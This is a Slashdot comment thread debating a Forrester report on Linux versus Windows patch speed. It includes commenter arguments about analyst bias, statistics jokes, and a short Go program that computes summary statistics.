    3 days from the first vulnerability report is typical, as was shown when OpenSSH and Apache had obscure but potentially nasty vulnerabilities.

    Microsoft gets as long as they want to play with it, because CERT and other security organizations do not publish the vulnerability until the vendor approves it. This has gone on for *years* with some of the underlying Microsoft graphical display system vulnerabilities, which are regularly circulated among the alt.2600 crowd of script kiddies but have never been published by CERT despite numerous reports because Microsoft has not published a patch and given their vendor blessing.

    The Forrester report is dead wrong in half a dozen distinct ways, including the vast under-reporting of Microsoft vulnerabilities because no one *expects* it to be secure, and thus doesn't bother to report.

  44. Re:If you think that mass-circulated study is bad. by Spyro+VII · · Score: 1

    > In this day and age, nobody seems to ever admit doing wrong.

    Yeah, especially since they didn't do anything wrong....

    Go google it for yourself though.
  45. I dub thee -1 Slashbot by Anonymous Coward · · Score: 0

    Yes, because Mandrake, Red Hat et al exist solely for the community. They have no commercial interests, they do everything out of the goodness of their heart. Red Hat is more concerned about the community than its shareholders.

    Let's go further, Red Hat exists solely for the promotion of peace on earth and the protection of the little people. It believes that Linux will end world poverty and stop wars.

    1. Re:I dub thee -1 Slashbot by Master+of+Transhuman · · Score: 1

      Yeah, and Bill Gates gives millions to charity.

      Oh, wait, I already pointed out that is a stock laundering scheme.

      Never mind.

      --
      Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
  46. Article Summary by big_groo · · Score: 2, Funny

    "Is Linux more Secure than Windows?" *cough*Bullshit*cough* signed, Noah Meyerhans, Debian Vincent Danen, Mandrakesoft Mark J Cox, Red Hat Roman Drahtmueller, SUSE

  47. These reports are useless by ljavelin · · Score: 4, Insightful

    I remember reading a report from one of these big research firms (I think) in 1997. It was a report first published in 1994. It talked about how Apple would own the desktop (90% probability), NeXT would be a power player (90% probability), and how GuptaSoft would drive most IT applications (90% probability).

    Funny, the report was ALL about WRONG. Nothing was close to reality. How did they get it SO WRONG?

    In another situation, I was directed by Management to ask one of these big research firms about embedded database products. At the time they didn't have any expertise in that area. However, they found a kid internal to the company that was willing to learn so they could write a report. It seemed silly and convoluted. Here's a guy without the necessary understanding or expertise, and in a few weeks he's going to learn and gather enough information to write a report? A Report that other people will use to make decisions? Crazy!

    In the end, I concluded that these reports are useless "on the ground". They're only useful for those who wish to pretend that they've done adequate research.

    So my short answer is: These research firms exist to just cover butts and promote positions. Any IT management personnel that subscribe to their services should be FIRED. It's negligent to cite their reports; it's negligent to use them as a resource. If you need expertise, hire a consultant with REAL expertise, not a generic and biased report. If you want a biased report, the sales guys will come to you for free.

    1. Re:These reports are useless by ChrsJxn · · Score: 1

      I think they miscalculated the sheer amount of money Microsoft was willing to pour into relatively risky business strategies, and then the amount of money they were willing to spend buying anything and/or everything that started to make money. Oh, don't forget about how if they couldn't buy it, they'd copy it and buy lawyers to win lawsuits.

      Apple could have owned the desktop market. Considering how many people own computers, but don't know the first thing about how to use any sort of advanced features, you'd think Apple would be on top. Mostly because Apple crashes less often, and it's absurdly easy to use.

      Unfortunately, Microsoft wins there too because they made a bunch of deals with hardware providers to exclusively sell computers with Windows, and Apple didn't want to do the same. At this point, most people who aren't technically inclined don't even think about what OS they're using, they just go down to the local Dell (Yes, they actually have stores, as scary as that is.), and pick up a cheap Windows machine.

      Guess this just goes to show you. Statistics are great, for telling you what everything was like yesterday.

      --
      I once saw a /. article with 1 comment.
      I should've got a screenshot.
    2. Re:These reports are useless by K8Fan · · Score: 1

      I used to work at Forrester (developed a web site for them and served as the token geek). The unofficial company motto is: "We only have to be right more than 50% of the time".

      --
      "How perfectly Goddamn delightful it all is, to be sure" Charles Crumb
    3. Re:These reports are useless by Anonymous Coward · · Score: 0

      This is not just in IT but also in electronics, where i used to work.

      A new type of chip scale packaging was supposedly hot, lots of research firms gave figures on how it would dominate the market in "just a few years time". Guess what, it still hasn't.

  48. www.forrester.com runs Solaris by olddoc · · Score: 1

    Check out http://uptime.netcraft.com/up/graph/?host=www.forrester.com

    At least they aren't running IIS on Windows 98!

    --
    Power tends to corrupt, and absolute power corrupts absolutely.
  49. No matter who says what by pair-a-noyd · · Score: 5, Interesting

    I'm staying with Linux and my money goes with Linux. After two years of running Linux I've not been hacked once, I've not gotten ONE SINGLE VIRUS, I've not had to look at one single pop-up ad that I didn't want to look at, I've not had to look at one single BSOD, I've not had to reboot one single time unless I chose to.

    I don't have to spend all my time in a panic worried about patches and viruses and other such nonsense. Neither do my friends and family, I converted them to Linux too. Now I don't have to worry about them either.

    What does Windows offer me that I can't do with Linux? Nothing. Why should I use Windows, which is constant trouble and extremely high maintenance and is a constant cash drain, versus the ONE TIME PURCHASE (if I choose to purchase v. free download) of a Linux distro, in my case Suse, that is mine, with no strings attached and will cost me no further money, ever?

    Once I own the $89 Suse distro I never have to spend another penny on it or any other software, ever. It works. It's secure. Anyone that says it isn't is a stupid SOB or a liar or both.

    1. Re:No matter who says what by bruthasj · · Score: 1

      Now if I can get that darned IBM T30 to suspend without crashing X and KDE, and if Qt didn't crap out on double-byte Chinese fonts, I might buy into the "It works" portion of your rant. Yes, I've upgraded kernels 2.4.x, 2.6.x, blah blah. ACPI don't work. And APM bugs out.

      (BTW, I run Linux exclusively on my IBM T30 .. no windows at all. In fact, I run several flavors in chroot environments on both the laptop HD and an external USB HD.)

  50. ease of use vs. security by kardar · · Score: 2, Insightful

    I remember once I installed OpenBSD on an old SparcStation 1+ (that's 25 MHz) with a 1 GB SCSI drive. I was new to it, and so when the install process asked what "security level" I wanted to install at, I installed at one below the most secure. It was very strange. Very hard to get anything done, it had no path.

    I changed the security level to "normal" because I just got freaked out by how strange it was; I only wanted to see if I could get the box running at all, and the heightened security level was making life difficult.

    So the real study that someone should do, is how "ease of use" affects "security". Because that's where the real deal is at. It's just like having to go through the lines at the airport - the more secure we need to be, the more of a pain it is for everyone.

    There is definitely an inverse relationship between "ease of use" and "security". Seeing as how there is a big focus on making Linux easy to use, or at least it seems to me that there is; I get the feeling that people won't accept Linux if it's not as easy to use as Windows or OS X, I wouldn't be surprised to see Linux security, or "user friendly" Linux security suffer a little bit.

    But still, Linux has been designed from the outset with security in mind; other user-friendly OS's are designed for ease of use. It's going to take some time, but we are slowly going to move in the right direction. If Linux is a secure OS now, and some consultancy group says that it isn't, then the trick would be to make it LESS secure by making it more user-friendly, and immediately, consultancy groups and analysts will be saying that it is secure. But that's a sacrifice that's not really worth it. However, unfortunately, given the open nature of Linux, and that fact that it can go in many directions, we will probably see Linuxes that are less secure than they could be because of the focus on user-friendliness. So I guess that means that analysts are going to change their minds? I wouldn't be surprised.

  51. It's not a horrible report by digidave · · Score: 2, Interesting

    It's fair given administrators who only patch based on official distribution releases. It seems to not care that they are making Linux companies responsible for a lot of 3rd party software such as Apache. It stands to reason that their average patch release would be slower if they're maintaining thousands of applications. It's more important that they release OS updates and core software updates quickly. Their customers have to take some responsibility for updating 3rd party software even if it does come on the same CD as the distro.

    Perhaps of more concern to administrators should be the nondisclosed vulnerabilities found by researchers such as eEye that are not patched. I can't find the link now, but eEye alone has dozens of vulnerabilities they've let MS know about, but haven't been patched for sometimes hundreds of days. eEye is just being courteous by not disclosing the bugs until MS fixes them. By using the disclosure time as a 'start time', Forrester is ignoring the lead time developers get. It's my experience following the Bugtraq and Full Disclosure mailing lists as well as many OSS projects that most major OSS developers respond quicker within their lead time before disclosure.

    Forrester is completely ignoring vulnerabilities that are not public knowledge, which is misrepresenting the problem.

    --
    The global economy is a great thing until you feel it locally.
    1. Re:It's not a horrible report by stackentol · · Score: 1

      What I wonder is if they actually included flaws in all software in the distros. That would be comparable to Windows plus IIS, Exchange Server, Office, streaming servers, SQL Server (times X) and just about anything else they offer. Oh how nice those numbers would add up.

  52. Re:If you think that mass-circulated study is bad. by Anonymous Coward · · Score: 0

    I stopped when I saw the line "Yankee Group". Just did a quick skim and there was our favorite analyst spouting off something - what a Didiot!!

  53. All those "Linux" vulnerabilities? by Anonymous Coward · · Score: 0

    Wonder how one can compare the number of vulnerabilities of a complete GNU/Linux distribution against Windows!

  54. Windows will never be proven superior by TechniMyoko · · Score: 0

    Cause /.ers keep denying the evidence is real

  55. p.s. -- replying to my own post by kardar · · Score: 1

    I just thought of this. It's a fine line between how secure you want something to be, and how much of a pain it is. It's the whole 9/11 thing. Too much security is a bad thing, because it shuts down the economy, and makes life exceedingly difficult, not to mention that it affects freedoms that we are used to. We hear this kind of talk in the media all the time. It's a fine line - too little security, disaster happens - too much, life gets difficult and the economy suffers.

    So the fact that it takes a certain amount of time to respond to security problems is indicative of the superior nature of Linux. Even though some analyst may say that this is technically not as secure as something else, with Linux you can let things slide a little more because that's just the kind of OS it is. The distros are "on top" of it, because still, nothing bad really happens. That's the test - what bad happens. If nothing bad happens, it doesn't matter how you look at it, because the bottom line - your data is safe.

    Furthermore, if need be, you can "crank up" the security level in Linux. Way up. National security level. Hardened. Trusted. It's just unnecessary, and makes it harder to use for non-critical situations.

    So look at the bottom line, and look at the ability to crank up the security level. Windows has very little ability to crank up any security level, it needs hardware to do that. Linux can crank up the security without needing specialized hardware.

    Linux is superior, and the fact that it is "less secure than Windows", yet nothing bad happens, just goes to prove how technically superior it really is. These analysts have just shown how superior Linux really is.

    1. Re:p.s. -- replying to my own post by Anonymous Coward · · Score: 0

      Furthermore, if need be, you can "crank up" the security level in Linux. Way up. National security level. Hardened. Trusted. It's just unnecessary, and makes it harder to use for non-critical situations.

      Ahhh, yes... but suppose you work for the DoD (some of us might, around here :) and you have a server that's supposed to be able to serve information classified at Top Secret to one user (who has the appropriate access rights and is logged in to your multi-user system), and information that is merely Confidential to another user who only has clearance at that level.

      At that point, you'll be damn happy your OS is hardened appropriately :)

  56. very slanted by bangular · · Score: 4, Funny

    These reports are so dumb. In high school, I remember learning that averages don't give a good representation, because extremes will skew the numbers. The median is a better representation. Funny how some people don't seem to remember that. By Forrester's methods of research, they could come to the conclusion that the average American has one testicle (statistically true btw).

    1. Re:very slanted by anagama · · Score: 2, Interesting

      I don't know whether to mod you funny (testicle comment) or insightful (statistics comment). We need a "Funny but True" option!

      --
      What changed under Obama? Nothing Good
    2. Re:very slanted by Cecil · · Score: 4, Insightful

      In high school, I remember learning that averages don't give a good representation, because extremes will skew the numbers. The median is a better representation.

      First of all, it's called a "mean", not an average. It's a type of average. The median is also an average. So is the mode.

      Secondly, the median is not necessarily a better representation, just different. With the median, for example, you have *no idea* whether there are any extreme outliers. 1,1,2,5000000,90000000000. Median is 2. Is that representative of that set of numbers? Not really. The mean would give you a much better idea of what range of numbers you're dealing with in that case. That's why real statistics with distribution curves and standard deviation are important.

      Anyway, I'm done nitpicking. I agree that these reports are blatantly skewed. This is not really a surprise. Almost all research is funded and biased these days. Much like news media. It's a simple fact of life. The important thing is to know your source, and try to understand their motivations.

      When the next "scientific study" comes along saying that P2P increases music sales, no matter how much you believe that to be true, you need to take a look at who's writing it, and why. Is this some graduate student who is probably downloading his own MP3s all the time and just trying to justify their habits to the world? Perhaps not, but it's wise to make sure before you start throwing his or her study around as if it were gospel.

      Sorry if that sounded as if it was directed at you, it wasn't really. It's just some good advice (in my opinion).

    3. Re:very slanted by ChrsJxn · · Score: 1

      Actually, the average American has LESS than one testicle (more women than men, and some eunuchs too), unless there are a great number of people floating around here somewhere that have three. I can so imagine someone putting this in the census: "Please list the names and ages of each person in your household, as well as the number of testicles per person".

      --
      I once saw a /. article with 1 comment.
      I should've got a screenshot.
    4. Re:very slanted by natrius · · Score: 2, Funny

      So... if they used the median instead, they would come to the conclusion that the average American has no testicles since there are more women than men in America. Is that really any better? I don't want North Korea thinking we have no balls.

    5. Re:very slanted by Anonymous Coward · · Score: 0

      First of all, it's called a "mean", not an average. It's a type of average. The median is also an average. So is the mode.

      Rubbish. The word "average" has several meanings, but one of them is a synonym of "mean" in the statistical sense.

      The average, the median, and the mode are all measures of the center of a distribution. Presumably that's what you meant.

    6. Re:very slanted by BlackHawk-666 · · Score: 2, Funny

      Since the population is slightly skewed (IIRC) towards women (~51%), and we are choosing to round down, I'd say the average American has no balls, mainly due to rounding errors ;->

      --
      All those moments will be lost in time, like tears in rain.
    7. Re:very slanted by Anonymous Coward · · Score: 0

      Bingo. And the parent poster seems upset that his measure of centre doesn't give him a good idea of the outliers. Well, DUH. You need a measure of spread for that:

      e.g., to take his example, 1,1,2,5000000,90000000000: the median is 2, the first quartile is 1 and the third quartile is 4.5e10, which gives a very good idea of the spread *and* the skewness (much better, in fact, than "mean=1.8e10" and "variance=1.62e21").
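To check the figures quoted in the two posts above (mean, variance, median and quartiles of 1, 1, 2, 5000000, 90000000000), here is an added Go program, not from either poster, implementing the standard definitions: the median of a sorted copy, quartiles by the exclusive method (medians of the lower and upper halves, with the overall median left out for an odd count), the mode as the most frequent value, and the sample variance with n-1 in the denominator, which is the convention under which the quoted 1.62e21 comes out.

```go
package main

import (
	"fmt"
	"math"
	"sort"
)

// threadSample is the set used in the thread.
var threadSample = []float64{1, 1, 2, 5000000, 90000000000}

// sortedCopy sorts without disturbing the caller's slice.
func sortedCopy(xs []float64) []float64 {
	s := append([]float64(nil), xs...)
	sort.Float64s(s)
	return s
}

// mean is the arithmetic average: sum divided by count.
func mean(xs []float64) float64 {
	total := 0.0
	for _, x := range xs {
		total += x
	}
	return total / float64(len(xs))
}

// median is the middle value of the sorted data; for an even count it is
// the average of the two middle values.
func median(xs []float64) float64 {
	s := sortedCopy(xs)
	n := len(s)
	if n%2 == 1 {
		return s[n/2]
	}
	return (s[n/2-1] + s[n/2]) / 2
}

// mode is the most frequent value; ties go to the smallest such value.
func mode(xs []float64) float64 {
	counts := map[float64]int{}
	for _, x := range xs {
		counts[x]++
	}
	best, bestCount := math.NaN(), 0
	for _, x := range sortedCopy(xs) {
		if counts[x] > bestCount {
			best, bestCount = x, counts[x]
		}
	}
	return best
}

// quartiles uses the exclusive method: Q1 and Q3 are the medians of the
// lower and upper halves, excluding the overall median when n is odd.
func quartiles(xs []float64) (q1, q3 float64) {
	s := sortedCopy(xs)
	n := len(s)
	return median(s[:n/2]), median(s[(n+1)/2:])
}

// sampleVariance divides the sum of squared deviations by n-1.
func sampleVariance(xs []float64) float64 {
	m := mean(xs)
	ss := 0.0
	for _, x := range xs {
		ss += (x - m) * (x - m)
	}
	return ss / float64(len(xs)-1)
}

func main() {
	q1, q3 := quartiles(threadSample)
	fmt.Printf("mean     = %.4g\n", mean(threadSample))
	fmt.Printf("median   = %.4g\n", median(threadSample))
	fmt.Printf("mode     = %.4g\n", mode(threadSample))
	fmt.Printf("Q1, Q3   = %.4g, %.4g\n", q1, q3)
	fmt.Printf("variance = %.4g (sample, n-1)\n", sampleVariance(threadSample))
}
```

Dividing by n instead of n-1 gives about 1.30e21; the 1.8e10 mean, the median of 2 and the 4.5e10 upper quartile match the thread either way. Applied to a list of days-to-patch, the same functions show the point the thread is making about the report: one very slow fix drags the mean a long way from the median, and the quartiles are what tell you whether that one fix is an outlier or the usual case.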

    8. Re:very slanted by Anonymous Coward · · Score: 0

      We need a "Funny but True" option!

      Isn't that what "Troll" is for? :p

    9. Re:very slanted by Anonymous Coward · · Score: 0

      if they used the median instead, they would come to the conclusion that the average American has no balls.

      The mode would be zero. The mean would be 1 (rounded to the nearest whole number) and the median would be 1.

      All three are averages, but they measure different things. Mode is the most frequent number, mean is the sum of all the numbers divided by the number of numbers, and median is the lowest number subtracted from the highest number, and that result is divided by two.

      IMNSHO, any report that states "average is", without stating whether it is the mode, mean, or median, is a report written by a PR flack, and has only a passing resemblance to marketing's beliefs about the value of the product, and no resemblance at all to the product being advertised.

    10. Re:very slanted by Sepper · · Score: 1

      You can make numbers say whatever you want. You just have to use Simpson's paradox

      --
      I live in Soviet Canuckistan you insensitive clod!
    11. Re:very slanted by maduro55 · · Score: 1

      I was lucky and got both of my balls back after my divorce.

  57. Re:Analyst hacks will never bite the hand that feed by WebCowboy · · Score: 4, Informative

    You are right in your suspicions that these sorts of "studies" are commissioned by Microsoft as part of their marketing strategy (just part of the business--Oracle, Sun, IBM etc parade studies that flatter their products as well after all). However, I don't dwell at all on these sorts of studies and I certainly wouldn't give them any meaningful weight when making a decision on deploying Linux (or not).

    Even given the positive spin towards Microsoft, however, Forrester's comments on the study are a barely lukewarm endorsement of Microsoft, and don't seem to be too critical of Linux. Check out some of the comments by Forrester analyst Laura Koetzle:

    Surprisingly, Microsoft did the best job at patching vulnerabilities fast, even though it ranked at the top with the largest percentage of its security holes rated as high

    So they DID acknowledge that Microsoft's platform had the most HIGH RISK vulnerabilities, although this fact is glossed over in the article. Koetzle also acknowledges that the study did NOT look at how WELL the patches addressed the problem (MS often needs to issue more than one patch to get it right, and sometimes they fix one bug and introduce another).

    "The fact that the Linux distributors fixed such a high percentage of their vulnerabilities is a remarkable achievement," she said. "Even Debian, in last place, was pretty darn thorough."

    Sure doesn't sound like something you'd expect an MS-paid cheerleader to say about the competition...

    This is very much a case of your mileage may vary

    Translation: even if patches are made fast they can still leak...

    The bottom line? Any of these platforms can be operated securely

    Quite the ringing endorsement for MS ain't it? Nice to see their people so solidly back their studies...

  58. Exponential Security by argoff · · Score: 3, Insightful

    One thing that I don't see mentioned is that as the GNU/Linux base grows larger, so does the proportion of competent developers who can spot and fix code security problems before they go mainstream. With MS, the number of people looking to spot code security problems remains constant no matter how big the user base.

    Although I've heard MS say that the reason Linux hasn't had as many big security problems is because it isn't used as much, I think the truth will turn out to be just the opposite. Not to mention that a hacker who finds a security flaw in Linux is more tempted to get fame by reporting it, and that fame becomes more prestigious as Linux grows, but a hacker who finds a security flaw in Windows will be more tempted to gain fame by exploiting it.

  59. Actual Conversation by cgenman · · Score: 2, Funny

    "You know, ever since I upgraded to Windows XP I haven't had a single Blue Screen of Death."

    "Does it randomly reboot?"

    "Sometimes."

    "You have automatic reboot on. It's like a Blue Screen of Death, but without the pretty colors."

    1. Re:Actual Conversation by Anonymous Coward · · Score: 0

      I've been running Win2K Pro for about 9 months, I don't remember a single OS crash. I've had many MSIE crashes, but always when I had 20-30 browser windows opened and a bunch of other apps.

      On my other, Linux, system, I've had zero crashes but the browser has been equally bad, even worse (considering that overall browser slowness on Linux wastes more time than occasional restarts on Windows).

      I also run a free personal firewall for Windows and I've never had any security problems with it.
      On Linux, I've spent days fscking with iptables and every small reconfiguration is a big waste of time 'cause I have to remind myself of the way the goddamn rules work.

      On the updates side, Windows downloads them automatically and that's great. Linux can do that but I cannot because a bunch of apps depend on other apps so I cannot allow (or even afford to fix) all "vulnerabilities". For example I have several weird h/w devices that require custom kernel modules, FreeSWAN, etc. - I don't want to do a kernel update just because I'd have to deal with all that mess again.

      From own and customers' experiences I've found Windows to have lower cost of ownership (yeah, laugh all you can) in SOHO/SME environment.
      For other situations (SANs, etc.) it depends - since one has to use an Enterprise version of Linux (because of storage compatibility), it's almost as expensive as the Windows OS.
      Apps that go on top of it (Oracle, J2EE, etc.) cost the same, so when you add extra training and support, it's hard to make considerable savings using Linux, so why bother.

      Personally I use Linux more than Windows, but I'd say it's not perfectly suitable for most companies (yet).

      It's just another OS... Once it's mature and as convenient as Windows, MS will open their source and lower the price (hell they could even buy Red Hat from their pocket money).

      Most companies don't care, and they shouldn't, which OS they use as long as it's good enough, and both Windows and Linux are almost good enough.

    2. Re:Actual Conversation by timmarhy · · Score: 1

      fuck off and post with your real name then if this is all true

      --
      If you mod me down, I will become more powerful than you can imagine....
    3. Re:Actual Conversation by Anonymous Coward · · Score: 0

      wtf have you been smokin?

    4. Re:Actual Conversation by Anonymous Coward · · Score: 0

      huh?

      I don't know what you tried to say, but I work support. Trust me, it does reboot just when you least expect it. In my case, it's mostly NVidia's crappy drivers.

  60. Re:Analyst hacks will never bit the hand that feed by Anonymous Coward · · Score: 0

    Yes, that would be the point he's trying to make.

    The point he is proving is this:

    Any slashdot story concerning Microsoft is so biased as to be useless. It's a circle-jerk for fanatics bordering on the religious, a bout of self-affirmation for a group slightly more fanatical than Mac owners. A report against Microsoft is published? Praise it to the heavens! A report in favor of Microsoft is published? Doubt the data, impugn the source and repeat the mantra "M$ is bad, mmkay?".

    Posted as an AC so the cocksucking slashbot moderators who have failed to read and understand (or independently realize) this don't gratuitously destroy my karma.

    - Muttley

  61. Couldn't resist ;) by Anonymous Coward · · Score: 0

    Run, Forrester, run!

  62. Not all Linux vendors have an open process by Anonymous Coward · · Score: 0

    Red Hat, for one, has internal bugs that aren't viewable to the general public - often including the person that reported the bug in the first place.

  63. My responce by Felinoid · · Score: 0, Flamebait

    How many viruses run under Windows? Answer: How many are in the wild?
    How many viruses run under Linux? Answer: Zero

    This isn't to say that there are no Linux viruses. Oh hells bells there probably are many (in a lab some place) and one released.

    BUT with a quick bug fix the Linux virus went away. Bye bye. It is fairly likely the lab viruses make use of one time defects that have long ago been fixed.

    It is reasonably easy to update open source software. So if the latest library has problems with your favorite apps you download the updates of the apps as well.

    With Windows those same updates cost money. Fixing a hole in Windows security may cost you quite a bit in rebuying the applications you rely on.

    There is also a pure attitude problem.
    In Linux each person takes his share of responsibility for being hacked.
    The programmers apologise and release a bug fix ASAP.
    The distros who didn't catch the bug and released the defective code release the bug fix with apologies.
    The admins who get hacked are red-faced for not catching the bug and apologise.
    The users smash head into wall for not armoring against attack. Not making backups. Not taking nominal precautions.

    Microsoft:
    Most of the anti-Microsoft slams Linux and Mac zealots repeat often come from Windows users who blame everyone but themselves.
    Windows admins have a pack of excuses so thick it makes you sick.
    Application developers: "Well it happens, you gotta expect it. Not our problem. Should have protected yourself.
    For $5,000 we'll audit your systems so this won't happen again."

    And Microsoft pays for reports on how OTHER operating systems are just as bad (or worse) instead of preventing the mistakes.

    In short:
    Linux: My fault, sorry, I'll fix it. Won't happen again (at every level)
    Microsoft: Not my fault. Your fault. You fix it. I can't be held responsible for YOUR stupidity. (at every level)

    This isn't even an open vs closed issue, however maybe the open and closed source communities do inspire these attitudes.

    This dates back to the original GNU and Microsoft attitudes way back in the 1980s.

    GNU: Everyone is responsible.
    Microsoft: You're so stupid it's all your fault.

    If I hear again how smart Microsoft's programming team is I'll throw up.
    That is the single most arrogant piece of bull I've heard.

    If Microsoft's programmers are so smart then I'm Einstein. Microsoft's coders make the kind of mistakes every day "I" knew to avoid when I was writing my own "Hello world" on a Commodore Vic 20 in 1979.

    --
    I don't actually exist.
    1. Re:My responce by BCW2 · · Score: 1

      To be accurate, as of today on my Winxp box Fprot has protection from:
      Viruses and Trojans
      48091 DOS/Windows
      404 Unix/Linux
      and 48211 other destructive programs.
      This count changes every few days on the Win side and not in a month for Unix/Linux.

      Which one is more vulnerable? You decide.

      --
      Professional Politicians are not the solution, they ARE the problem.
    2. Re:My responce by Anonymous Coward · · Score: 0

      What does that mean? It means that more virus/trojan writers target Windows. And why? Because Windows has a larger user base.

    3. Re:My responce by BCW2 · · Score: 1

      Because anyone with elementary VB skills can do it since it's so easy. Junior High level programming skills are all that's needed, and any language or scripting language more advanced than VB is just better, not really harder. M$ leaves too many holes and always will until they start over with a clean sheet and do a complete rewrite with no copy and paste from previous versions.

      If you look closely enough you can still find a few lines from Win 3.0 in XP.

      --
      Professional Politicians are not the solution, they ARE the problem.
  64. Re:Why worry about this ? by Anonymous Coward · · Score: 0

    Yes. Exactly. Let's worry about the basics first.

    Is your camera plugged in?

  65. Their opinion is meaningless by codepunk · · Score: 1

    Sort of like the one that I saw yesterday that says that linux cannot scale as well as unix. Never mind it currently holds the TPC-C record. As for security, does Windows have the flexibility to run port knocking? Can I modify all of the port settings for all of the services in Windows?

    One of the biggest strengths in linux is its flexibility. Windoze lacks the flexibility required to create a diverse environment.

    I hereby declare that Windows security is not as good as Linux.

    --


    Got Code?
  66. Something True by Deviate_X · · Score: 2, Insightful

    Yeah! It's So Obvious Linux Is More Secure Than Windows!

    Just Don't Store Your Important Source Code On It.... :))))))))))))

  67. do your homework DUDE!!! by Anonymous Coward · · Score: 0

    the forrester guys obviously aren't familiar with the open source process. sure, patches aren't "released" for longer, but:
    a) any admin can opt to install an early (sometimes buggy itself, sometimes not) version of the patch before their "vendor" (red hat, mandrake, etc) officially ok it.

    b) the source code is right there, staring at the admin, just a cd away. If the bug is that mission-critical the admin needs to get off his lazy ass and hack together a patch until a better one is released, and possibly even get on whatever mailing list is involved and throw his source at it (if his contract allows). You never know, it might hurry the official patch up quite a bit. Under the Windows model, this is all but impossible.

    c) Microsoft patches are a joke. They usually fix the intended problem by the second, sometimes third try. However, there are long complained about IE and Outlook vulnerabilities that have leaped the gap of major version changes! You know, the version changes that cost companies TENS OF THOUSANDS OF DOLLARS.
    my $0.02
    Oh, and a d!
    d) What home user really uses Microsoft update? Not very many, because it's a pain in the ass. Fedora's model of a simple "yum update" is blissful. I would guess that RH's enterprise offerings are even better. When was the last time an update to your linux system (save a kernel update) required a reboot? never, or close to it. This happens routinely in Windows Update. Once more, WINDOWS UPDATE IS A PAIN IN THE ASS TO USE. As a result, many many machines are not patched, not after it is released, not a month later - NEVER.
    the end
    for real this time.

  68. Yes, these reports are usless. by Anonymous Coward · · Score: 0

    I should know, I just did a bunch of research on the web for my boss to write a whitepaper about the performance of a scientific application on various high-end servers. We have no evidence, just what others posted on the web.
    I assume all whitepapers are done this way.

    Posting AC to keep my job.

  69. Actually by PedanticSpellingTrol · · Score: 1

    While you sound like the commendable type who's willing to spend the money to support further development, for the sake of accuracy I feel compelled to mention that you don't have to spend the initial penny on SuSE professional, you can install it over FTP from any of several servers. 129.79.5.130 is pretty fast :-)

    1. Re:Actually by cornjones · · Score: 1

      Though, if you love it so much and it does so much for your organization, why don't you buy the distro every year or so. Continue funding the development you like so much.

  70. You can say a lot about Forrester... by Dj-Cj · · Score: 1

    but this isn't MS commissioned. The group Koetzle works in meets and plans research topics by what they think will be the biggest things on IT directors' minds. FORR used to pride themselves on not doing commissioned research (this may have changed in the last couple of years, but AFAIK it hasn't). If anything the biggest flaw is in the research. For the most part it's 50 companies that they can get on the phone. Some of the analysts have never worked in the fields they cover, they just learn by reading about it and talking w/vendors. One might write about the future shakeout of programming languages, but never even compiled "hello world". The product suffers w/out the experience and underlying knowledge of the topic.

  71. Re:Linux by jtev · · Score: 1

    Dude, lay off the troll juice a little. I have used Windows XP and I have to say that plucking out my eyeballs with a shopvac would be less painful than that candy coated shitfest. I used to think that KDE was too damned cartoony, but then I saw OS X and XP and I decided that EVERYONE is going cartoony, then RHS betrayed me with that abomination that is Blue Curve. STRAIGHT LINES people, I want STRAIGHT LINES, and not disgusting bubble gum colors, make things look like something that a professional would use, not a crappy candy coated bloatfest. Anyway I guess I'm done ranting. For now anyway.

    --
    That which is done from love exists beyond good and evil
  72. In our shop windows is really safe by codepunk · · Score: 1

    We got rid of all of our windows boxes so I guess it would be easy to claim it is safer because it no longer exists.

    --


    Got Code?
  73. will make a good 'letter to the editor' by LuxFX · · Score: 2, Interesting

    This is just one of the great things about Linux (or any open source project):

    Say an article about security is published in a magazine. The article takes a really good critical look at Linux vs. Windows and genuinely points out a few areas of improvement. Well, that just prompts the open source community to rev up their engines and (should they agree with the evaluation) they'll just go out and fix it! In fact, there's a pretty good chance that the fix is available in a development version in time to send a letter to the editor for the next month's issue.

    Now compare that to Windows. Microsoft would spend two, maybe three times that long debating with the media about whether or not it's a problem or a 'feature', and then whether or not it will be fixed immediately or we have to wait until 2031 for Looooooonghorn to be released. Then they'll just sit on it for a while to see if people really care about it being fixed, and how much. They might also, at this point, have their lawyers spend three weeks writing the licensing agreement for the patch, should it be created. Then they put the whole thing on hold and wait until somebody exploits the problem. Then, only if everything else has gone completely in their favor and the problem has been exploited and the existence of the problem has reached at least two major media outlets, they might work on a patch and distribute it....

    Then Microsoft will brag about how quickly they've updated their software in response to the problem... ...as Linux is releasing the seventeenth update since the article....

    --
    Punctanym: alternate spelling of words using punctuation or numerals in place of some or all of its letters; see 'leet'
  74. Re:Linux by Anonymous Coward · · Score: 0

    Windows XP still has the option to use the classic skin. If all you want is straight lines, XP has that covered. You know you want to come back to the greatest OS ever invented!

  75. The missing option... by DrYak · · Score: 1

    The article underlines the differences in urgency and speed of responses:

    They focus mainly on critical updates, and sometimes delay less critical ones (first fix the bug in SSL, then fix the bug that happens if someone uses GAIM to log into some alternate non-standard [not owned by Yahoo] Yahoo server), therefore explaining why the unbalanced average seems bad.

    But I think they missed the second important thing:
    You shouldn't compare the number of patches between a full distro and a Windows system.

    To be fair, you should compare the distro with the whole set of Microsoft patches for Windows+IIS+ASP+Office+VisualStudio+etc...
    or compare patches to the Linux Kernel+a few core libraries and applications to Windows.

    And I don't think that, done that way, a Linux distro will seem that patchy compared to Windows.

    --
    "Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
  76. "Debian, Mandrake, Red Hat, and SUSE" by Anonymous Coward · · Score: 0

    "Debian, Mandrake, Red Hat, and SUSE" And when they combine their powers into one, they become... VOLTRON!

  77. A comment on Forrester from one of their own. by ron_ivi · · Score: 4, Insightful

    Rob Enderle, formerly of Forrester writes:

    I got hate mail from other employees, and my employer, Forrester, was threatened to a level they had never seen before either. I was actually told, subsequent to this, that I was never to write about Linux again which was something that had never, to my knowledge, ever happened before.

    This actually became one of the core reasons I used when I resigned from Forrester, no one had ever dictated a position to me before and that had clearly changed. I've always had a problem with opinions for hire and had been very active in fighting that trend; opinions as a result of personal threat seemed much worse and, while this was hardly the only reason for my departure, it was a major one.
    1. Re:A comment on Forrester from one of their own. by Anonymous Coward · · Score: 0

      Never trust anyone who calls themselves the Enderle group.

    2. Re:A comment on Forrester from one of their own. by slipstick · · Score: 4, Interesting

      Never believe anyone who refers to the use of shared public domain code as "theft".

      From the rest of that article Enderle obviously has an axe to grind. It is quite possible he was threatened by a minority in the Linux community that can't seem to grow up and has obviously decided to hold a grudge against Linux as a whole.

